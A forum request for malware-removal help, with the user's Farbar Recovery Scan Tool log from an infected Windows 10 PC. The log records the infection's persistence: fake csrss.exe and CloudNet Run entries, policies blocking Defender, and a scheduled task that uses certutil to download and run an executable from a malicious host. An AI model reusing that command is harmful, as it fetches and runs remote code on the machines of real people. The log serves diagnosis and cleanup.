After a suspicious download, Windows Defender found some threats. I let it clean them and rebooted. Upon rebooting, Defender found them again and I removed them again. The next time it did not ask to remove anything and showed the removed threats. I attempted to run Malwarebytes, but each time I try I get a message saying "Windows cannot access the specified device, path or file. You may have not access...". This is also a new thing, obviously caused by the infection.

The next (new) problem is that in my installed programs list I see one called Cloudnet, which was installed today unintentionally. When I click to uninstall it, a DOS window appears with some Russian(?) characters which I cannot understand. If I click Enter, the window goes away but the program remains installed. The other symptom is that whatever is installed, it opens Firefox windows every few minutes.

I am not sure that I have understood your instructions about attaching files. Is it attaching these 2 files or copy-pasting the texts here? So I think I will do both. This is partly because the connection is not so good right now and I am having a hard time communicating with you properly. For example, the first times I tried to write this text, there was no text box to write in. It appeared just some minutes ago after a few attempts to reload the page, and finally I can write this to you. Thank you in advance for any help.
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 24-11-2019
Ran by SR (administrator) on DESKTOP-A0OS1Q6 (Gigabyte Technology Co., Ltd. To be filled by O.E.M.) (24-11-2019 19:50:32)
Running from D:\Users\SR\Downloads
Loaded Profiles: SR (Available Profiles: SR & Administrator)
Platform: Windows 10 Pro Version 1803 17134.345 (X64) Language: English (United States)
Default browser: FF
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
( ) [File not signed] C:\Users\SR\AppData\Local\Temp\is-2HG9K.tmp\Guitar.exe
() [File not signed] C:\Program Files (x86)\DSDCS\InputMapper HidGuardian\InputMapperCerberusWhitelister.exe
() [File not signed] C:\Users\SR\AppData\Local\Temp\is-FML3U.tmp\Guitar.tmp
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Brio) [File not signed] C:\Program Files\FolderSize\FolderSizeSvc.exe
(Creative Labs Inc -> Creative Technology Ltd) C:\Windows\SysWOW64\CtHelper.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(IDRIX -> IDRIX) C:\Program Files\VeraCrypt\VeraCrypt.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieCtrl.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieSvc.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieSvc.exe
(Logitech Inc -> Logitech) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOverlay.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\LogiOptions\LogiOptions.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Logitech Inc -> Logitech, Inc.) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOptionsMgr.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Windows -> Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1910.4-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1910.4-0\NisSrv.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Open Source Developer, Phillip Gibbons -> Highresolution Enterprises) C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(PACE Anti-Piracy, Inc. -> PACE Anti-Piracy, Inc.) C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe
(Polenter - Pawel Idzikowski -> Polenter - Software Solutions) C:\Program Files (x86)\Desktop-Reminder 2\DesktopReminder2.exe
(Reprise Software Inc.) [File not signed] C:\Program Files (x86)\The Foundry\LicensingTools7.0\bin\RLM\rlm.foundry.exe
(Reprise Software Inc.) [File not signed] C:\Program Files (x86)\The Foundry\LicensingTools7.0\bin\RLM\rlm.foundry.exe
(TeamViewer GmbH -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(WinAbility Software Corporation -> WinAbility® Software Corporation) C:\Program Files\IconShepherd\ISEXE64.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [XMouseButtonControl] => C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe [1605856 2019-08-18] (Open Source Developer, Phillip Gibbons -> Highresolution Enterprises)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\System32\LogiLDA.dll [3933496 2012-09-20] (Logitech -> Logitech, Inc.)
HKLM\...\Run: [AsioReg] => REGSVR32.EXE /S CTASIO.DLL*
HKLM\...\Run: [LogiOptions] => C:\Program Files\Logitech\LogiOptions\LogiOptions.exe [2176648 2018-06-18] (Logitech Inc -> Logitech, Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-01-18] (Apple Inc. -> Apple Inc.)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3136136 2019-01-30] (Logitech Inc -> Logitech, Inc.)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [6260544 2019-11-14] (Dropbox, Inc -> Dropbox, Inc.)
HKLM-x32\...\Run: [AsioThk32Reg] => REGSVR32.EXE /S CTASIO.DLL
HKLM-x32\...\Run: [CTHelper] => C:\Windows\SysWOW64\CTHELPER.EXE* [23040 2009-02-23] () [File not signed]
HKLM-x32\...\Run: [CTxfiHlp] => C:\Windows\SysWOW64\CTXFIHLP.EXE* [23552 2009-02-23] () [File not signed]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [645648 2019-10-05] (Oracle America, Inc. -> Oracle Corporation)
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\ DisallowedCertificates: 7D4EAFF45C5D8A3E9AB24486D12F4B4F7F4DBB60 (U)
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3199776 2018-04-03] (Valve -> Valve Corporation)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [DesktopReminder2ByPolenter] => C:\Program Files (x86)\Desktop-Reminder 2\DesktopReminder2.exe [3164048 2017-06-21] (Polenter - Pawel Idzikowski -> Polenter - Software Solutions)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [SandboxieControl] => C:\Program Files\Sandboxie\SbieCtrl.exe [3682968 2019-04-22] (Invincea, Inc. -> Sandboxie Holdings, LLC)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [Viber] => C:\Users\SR\AppData\Local\Viber\Viber.exe [38564936 2019-10-30] (Viber Media S.à r.l. -> Viber Media S.Ã r.l.)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [GreenResonance] => C:\WINDOWS\rss\csrss.exe [3937792 2019-11-24] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [7890540] => C:\Users\SR\AppData\Local\Temp\is-2HG9K.tmp\Guitar.exe [877745 2019-11-24] ( ) [File not signed] <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [CloudNet] => C:\Users\SR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-11-24] (EpicNet Inc.) [File not signed] <==== ATTENTION
HKLM\Software\...\Authentication\Credential Providers: [{AA96996E-48DD-4D31-A94D-8563298A8C2D}] -> C:\WINDOWS\system32\WACP.dll [2016-09-20] (Softomotive Ltd -> )
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Icon Shepherd.lnk [2019-10-31]
ShortcutTarget: Icon Shepherd.lnk -> C:\Program Files\IconShepherd\ISEXE64.exe (WinAbility Software Corporation -> WinAbility® Software Corporation)
GroupPolicy: Restriction - Firefox <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0E55825A-221F-4E7A-9416-6D13AA06ABD8} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
Task: {12152F8B-CD2F-42DE-A539-041A8A936465} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {14324AB2-DEA1-4205-8D09-E4BC117610AE} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24668024 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
Task: {15D1F9B6-04A3-4972-A83C-EF0F4BBB8427} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [899056 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {1B9C5A1B-9321-46BB-84C5-DF45191FF376} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [648504 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {2208EA4A-30D8-45CC-8BDD-7FC3B05195B5} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1374008 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {42596E64-0421-415A-9C21-4EC99F971F53} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {42CF4929-54EE-42D2-B729-F538516C85C2} - System32\Tasks\JumpingBytes\PureSyncVSS => C:\Program Files (x86)\Jumping Bytes\PureSync\PureSyncVSSStart.exe [35656 2016-06-16] (Jumping Bytes (Christoph Guentner) -> Jumping Bytes)
Task: {66B093E3-0989-45FD-B21D-EE39713B7201} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe
Task: {78A0CAD1-8991-4E6C-966D-4E69097977E8} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7F8AE7BB-B4DE-4B22-9729-1E5E19704D1A} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {881D3DFF-B43A-44C2-820D-F54679FAE900} - System32\Tasks\EPSON L130 Series Update {3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN6E.EXE [690536 2013-11-22] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
Task: {93894B49-495F-4FF7-A834-F07A572C2C25} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1374008 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {950BA929-9185-474B-B254-40BA3B8E3A1B} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [112976 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {962642C0-4430-4032-92EE-908F3A5F3E52} - System32\Tasks\ExclusiveTool => C:\Program Files (x86)\DSDCS\InputMapper\ExclusiveModeTool.exe [19968 2016-10-04] (InputMapper) [File not signed]
Task: {99C2988F-4978-44CF-9C99-C8698A7E4DD0} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24668024 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
Task: {9FAB49BF-9A8A-43A8-A5BF-493EE72EF726} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616320 2018-01-08] (Apple Inc. -> Apple Inc.)
Task: {A197B1E1-5017-44E1-8786-700A5A077A97} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [112976 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {A2CB4A3E-AFDC-43FA-98BA-0A92F7E5DABE} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [899056 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {A809944B-8D1B-4F63-BB06-E2CD920F61A2} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4321688 2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {AD74C57C-54F0-4805-B7A0-CB5A9FA03223} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {B264C95D-A9B6-4D69-9B94-FB67D6DB757E} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
Task: {B69A753B-777A-4C1E-AA9D-1033C77839DE} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\WINDOWS\explorer.exe /NOUACCHECK
Task: {B6C27676-7B71-492F-BB86-892E15752F97} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [3937792 2019-11-24] () [File not signed] <==== ATTENTION
Task: {C68E190A-5D0C-40B1-895A-9522150D9369} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {C789D50A-A2A0-405F-B279-A59DBA0D126E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://tfortytimes.com/app/app.exe C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {CCC37DAD-9377-4ED5-80DB-F21C8D60E2E6} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {D34CA7D5-150E-4A42-9C1F-D72B477043A6} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {DC559262-3918-4E5A-B027-44ED71265B49} - System32\Tasks\JumpingBytes\PureSyncExit => C:\Program Files (x86)\Jumping Bytes\PureSync\PureSyncAdmin.exe [105808 2018-11-12] (Jumping Bytes (Christoph Guentner) -> Jumping Bytes)
Task: {E02831A3-E4D2-410D-9AAC-0268EE1483DF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {F1C3AFE7-5B89-4B71-8D62-12804C3764B1} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F7413A74-A9B1-4E6A-91D4-0570477CA0ED} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3787304 2019-05-23] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F9DCD18B-6730-49E0-8339-A8013E910822} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4321688 2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {FEF2A145-6CB7-48B3-827C-4FFCF30E20F1} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\EPSON L130 Series Update {3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN6E.EXE:/EXE:{3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140} /F:UpdateWORKGROUP\DESKTOP-A0OS1Q6$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
ProxyServer: [S-1-5-21-3967059023-4107875624-2872843465-1001] => http=127.0.0.1:8888;
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 1.1.1.1 1.0.0.1
Tcpip\..\Interfaces\{2a8e95f9-250a-4cdc-8d08-f661e3f2a913}: [DhcpNameServer] 1.1.1.1 1.0.0.1
Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope value is missing
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_231\bin\ssv.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2019-01-30] (Logitech Inc -> Logitech, Inc.)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_231\bin\jp2ssv.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2019-01-30] (Logitech Inc -> Logitech, Inc.)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
FireFox:
========
FF DefaultProfile: qyonbq05.default-1454591260015
FF ProfilePath: C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release [2019-11-24]
FF Notifications: Mozilla\Firefox\Profiles\dho1fb01.default-release -> hxxps://mail-notification.info
FF Extension: (DuckDuckGo Privacy Essentials) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\[email protected] [2019-10-27]
FF Extension: (Skip Redirect) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\[email protected] [2019-11-15]
FF Extension: (Adblocker Lite) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\{3596f810-bf50-47e2-b54a-2128ebdc5179}.xpi [2019-06-05]
FF ProfilePath: C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 [2019-11-24]
FF DownloadDir: D:\Users\SR\Downloads
FF NewTab: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> about:newtab
FF NetworkProxy: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> type", 0
FF Notifications: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> hxxps://mail-notification.info
FF Extension: (Disconnect) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-04-15]
FF Extension: (Grammarly for Firefox) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-02-04]
FF Extension: (AdGuard AdBlocker) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-04-17]
FF Extension: (Block Site) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\{54e2eb33-18eb-46ad-a4e4-1329c29f6e17}.xpi [2019-05-01]
FF Extension: (Adblock Plus - free ad blocker) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2019-04-20]
FF Extension: (No Name) - C:\Program Files\Mozilla Firefox\browser\features\{EBA45A79-A229-44D3-A606-3DADEAC6A066}.xpi [2019-08-11] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2019-10-19] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_32_0_0_223.dll [2019-08-04] (Adobe Inc. -> )
FF Plugin: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [2017-05-26] (Shenzhen Thinksky Technology Co.,Ltd -> )
FF Plugin: @java.com/DTPlugin,version=11.231.2 -> C:\Program Files\Java\jre1.8.0_231\bin\dtplugin\npDeployJava1.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.231.2 -> C:\Program Files\Java\jre1.8.0_231\bin\plugin2\npjp2.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-10-25] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_223.dll [2019-08-04] (Adobe Inc. -> )
